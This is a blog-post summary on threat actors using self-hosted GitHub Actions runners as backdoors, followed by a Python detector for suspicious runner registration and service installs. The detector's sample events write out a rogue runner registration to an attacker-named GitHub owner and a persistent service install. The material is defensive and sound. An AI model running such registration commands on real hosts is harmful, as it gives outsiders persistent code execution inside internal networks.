How threat actors are using self-hosted GitHub Actions runners as backdoors
Blog post from Sysdig
Threat actors are exploiting self-hosted GitHub Actions runners as backdoors, allowing them to maintain persistent access to compromised systems by using trusted communication channels that evade traditional network defenses. The Shai-Hulud worm exemplifies this threat by using GitHub's infrastructure to establish rogue runners after compromising developer machines. The attackers leverage intentionally vulnerable workflows to execute arbitrary code, posing a significant security risk due to the runners' access to internal networks and cached credentials. The article recommends several mitigation strategies, including using ephemeral runners, restricting runner access to trusted repositories, and implementing runtime detection for persistence techniques to counteract these threats effectively. The case study of the Shai-Hulud campaign highlights the need for organizations to treat the security of self-hosted runners as a priority to prevent attackers from gaining privileged access to critical infrastructure.
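The summary above names runtime detection of persistence techniques as one mitigation. The following is an added example, not code from the Sysdig post or from Sysdig's tooling, of what such a check can look like on process-execution telemetry: it flags a runner registration (`config.sh`) that omits `--ephemeral`, a registration whose `--url` points at a GitHub owner outside an allowlist, and installation of the runner as a system service (`svc.sh install`). The event line format, the host and user names, the `example-org` / `attacker-ctl` owners and the `TRUSTED_OWNERS` allowlist are all constructed for the example; the `config.sh` flags and `svc.sh` subcommand are those of the official GitHub Actions runner.

```python
import re
import shlex
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed process-execution events (not from the blog post or any real incident).
# Format: "<timestamp> host=<host> user=<user> cmd=<command line>"
SAMPLE_EVENTS = [
    "2024-01-10T09:00:01Z host=ci-01 user=runner cmd=./config.sh --url https://github.com/example-org/app --token REDACTED --ephemeral --unattended",
    "2024-01-10T09:00:02Z host=ci-01 user=runner cmd=./run.sh",
    "2024-01-10T11:42:10Z host=dev-laptop-7 user=alice cmd=./config.sh --url https://github.com/attacker-ctl/loot --token REDACTED --unattended --name dev-laptop-7",
    "2024-01-10T11:42:15Z host=dev-laptop-7 user=alice cmd=sudo ./svc.sh install",
    "2024-01-10T12:00:00Z host=build-02 user=root cmd=./config.sh --url https://github.com/example-org/infra --token REDACTED --unattended",
]

# Hypothetical allowlist: GitHub organizations this fleet's runners may register with.
TRUSTED_OWNERS = {"example-org"}

EVENT_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd=(?P<cmd>.*)$")


@dataclass(frozen=True)
class Finding:
    ts: str
    host: str
    user: str
    rule: str
    detail: str


def _flag_value(argv, flag):
    """Return the argument following `flag`, or None if the flag is absent."""
    for i, arg in enumerate(argv[:-1]):
        if arg == flag:
            return argv[i + 1]
    return None


def _basename(arg):
    return arg.rsplit("/", 1)[-1]


def analyze_event(line, trusted_owners):
    """Return the findings raised by one process-execution event."""
    m = EVENT_RE.match(line)
    if not m:
        return []
    ts, host, user, cmd = m.group("ts", "host", "user", "cmd")
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return []
    # A leading sudo does not change which program is being run.
    if argv and _basename(argv[0]) == "sudo":
        argv = argv[1:]
    if not argv:
        return []

    prog = _basename(argv[0])
    findings = []
    if prog == "config.sh":
        url = _flag_value(argv, "--url")
        owner = None
        if url:
            parts = urlparse(url).path.strip("/").split("/")
            owner = parts[0] or None
        # Non-ephemeral runners keep accepting jobs, which is what makes them useful as a backdoor.
        if "--ephemeral" not in argv:
            findings.append(Finding(ts, host, user, "NON_EPHEMERAL_RUNNER",
                                    f"registration for {url} without --ephemeral"))
        # A runner registered to an owner we do not control gives that owner code execution here.
        if owner not in trusted_owners:
            findings.append(Finding(ts, host, user, "UNTRUSTED_RUNNER_TARGET",
                                    f"runner registered to {url!r}; owner {owner!r} not in allowlist"))
    elif prog == "svc.sh" and "install" in argv[1:]:
        # Installing the runner as a service survives reboots: classic persistence.
        findings.append(Finding(ts, host, user, "RUNNER_SERVICE_INSTALL",
                                "runner installed as a persistent system service"))
    return findings


def analyze_events(lines, trusted_owners=TRUSTED_OWNERS):
    """Run the checks over a sequence of event lines and return all findings in order."""
    out = []
    for line in lines:
        out.extend(analyze_event(line, trusted_owners))
    return out


if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print(f"{f.ts} {f.host} {f.user} {f.rule}: {f.detail}")
```

On the constructed events, the ephemeral registration on `ci-01` is silent, the developer laptop produces three findings (a non-ephemeral runner, registered to an owner outside the allowlist, then installed as a service), and `build-02` is flagged only for the missing `--ephemeral`. In a real deployment the same logic would sit on top of whatever execve telemetry the fleet already collects, and the allowlist would come from the organization's runner-group configuration.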